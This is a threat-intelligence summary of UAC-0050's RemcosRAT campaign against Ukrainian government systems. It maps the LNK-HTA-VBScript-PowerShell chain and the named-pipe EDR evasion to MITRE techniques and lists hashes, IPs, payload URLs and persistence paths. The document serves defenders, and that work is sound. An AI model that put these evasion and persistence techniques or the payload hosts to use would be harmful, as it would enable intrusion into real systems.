UAC-0050’s Ukrainian-targeted operation leverages RemcosRAT with a Windows pipe-based interprocess communication channel to evade EDR/antivirus defenses and move data covertly. The campaign uses a multi-stage chain (LNK → HTA → VBScript → PowerShell) culminating in RemcosRAT execution in memory, highlighting a sophisticated stealth approach and geopolitical risk to government systems.
Keypoints
- UAC-0050 targets Ukrainian government entities with RemcosRAT and a pipe-based data transfer channel to evade EDR/AV detection.
- The attack chain starts with a malicious LNK, proceeds through HTA/VBScript to PowerShell, and downloads word_update.exe from a server.
-
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – Indications lean towards phishing or spam emails, masked as job propositions. Quote: ‘indications lean towards phishing or spam emails, masked as job propositions.’
- [T1218.005] Mshta – The threat uses MSHTA to execute embedded content after deobfuscation. Quote: ‘the string is then executed using MSHTA.’
- [T1059.005] Command and Scripting Interpreter: VBScript – The HTA contains a VBScript with fully obfuscated script content. Quote: ‘VBScript file with fully obfuscated script content.’
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell script downloads a malicious payload and executes it. Quote: ‘download a malicious payload (word_update.exe) from a server’ and ‘execute the decrypted payload as a new PowerShell process.’
- [T1559.001] Inter-Process Communication: Named Pipes – Data is shared through a pipe to move decrypted payload into memory. Quote: ‘shares malicious data through a pipe’ and ‘unnamed pipes’.
- [T1055] Process Injection – RemcosRAT is executed in memory and injected into explorer.exe memory. Quote: ‘Remcos binary in the memory of cmd.exe (RW)’ and ‘execution flow from word_update.exe.’
- [T1105] Ingress Tool Transfer – Malicious payload downloaded from a remote server. Quote: ‘download a malicious payload (word_update.exe) from a server.’
- [T1071.001] Web Protocols – Payloads are downloaded from the domain new-tech-savvy[.]com. Quote: ‘download a malicious payload (word_update.exe) from a server’ and ‘domain new-tech-savvy[.]com.’
- [T1518.001] Software Discovery – The LNK file gathers information about antivirus products installed on the target. Quote: ‘gathers information regarding antivirus products installed on the target computer.’
Indicators of Compromise
- [File Hash] LNK file – 56154fedaa70a3e58b7262b7c344d30a, 7f87d36c989a11edf0de9af392891d89, and 1 more hash
- [File Hash] 6.hta – 9b777d69b018701ec5ad19ae3f06553f
- [File Hash] ofer.docx – 74865c6c290488bd5552aa905c02666c
- [File Hash] word_update.exe – 7c05cfed156f152139a6b1f0d48b5cc1, and 1 more hash (from fmTask_dbg.exe same value)
- [File Hash] fmTask_dbg.exe – 7c05cfed156f152139a6b1f0d48b5cc1
- [File Hash] Remcos – 0b2d0eb5af93a3355244e1319e3de9da
- [Domain] Domain: new-tech-savvy.com – used as payload host; 2 more domains/URLs listed in article
- [IP] 194.87.31.229, 46.249.58.40 – observed hosts for C2 or download
- [URL] new-tech-savvy.com/6.hta, new-tech-savvy.com/word_update.exe, new-tech-savvy.com/ofer.docx
- [File Path] C:UsersAppDataRoamingWordpadServicefmTask_dbg.exe – persistence path
- [File Path] C:UsersAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupfmTask_dbg.lnk – startup persistence
Read more: https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method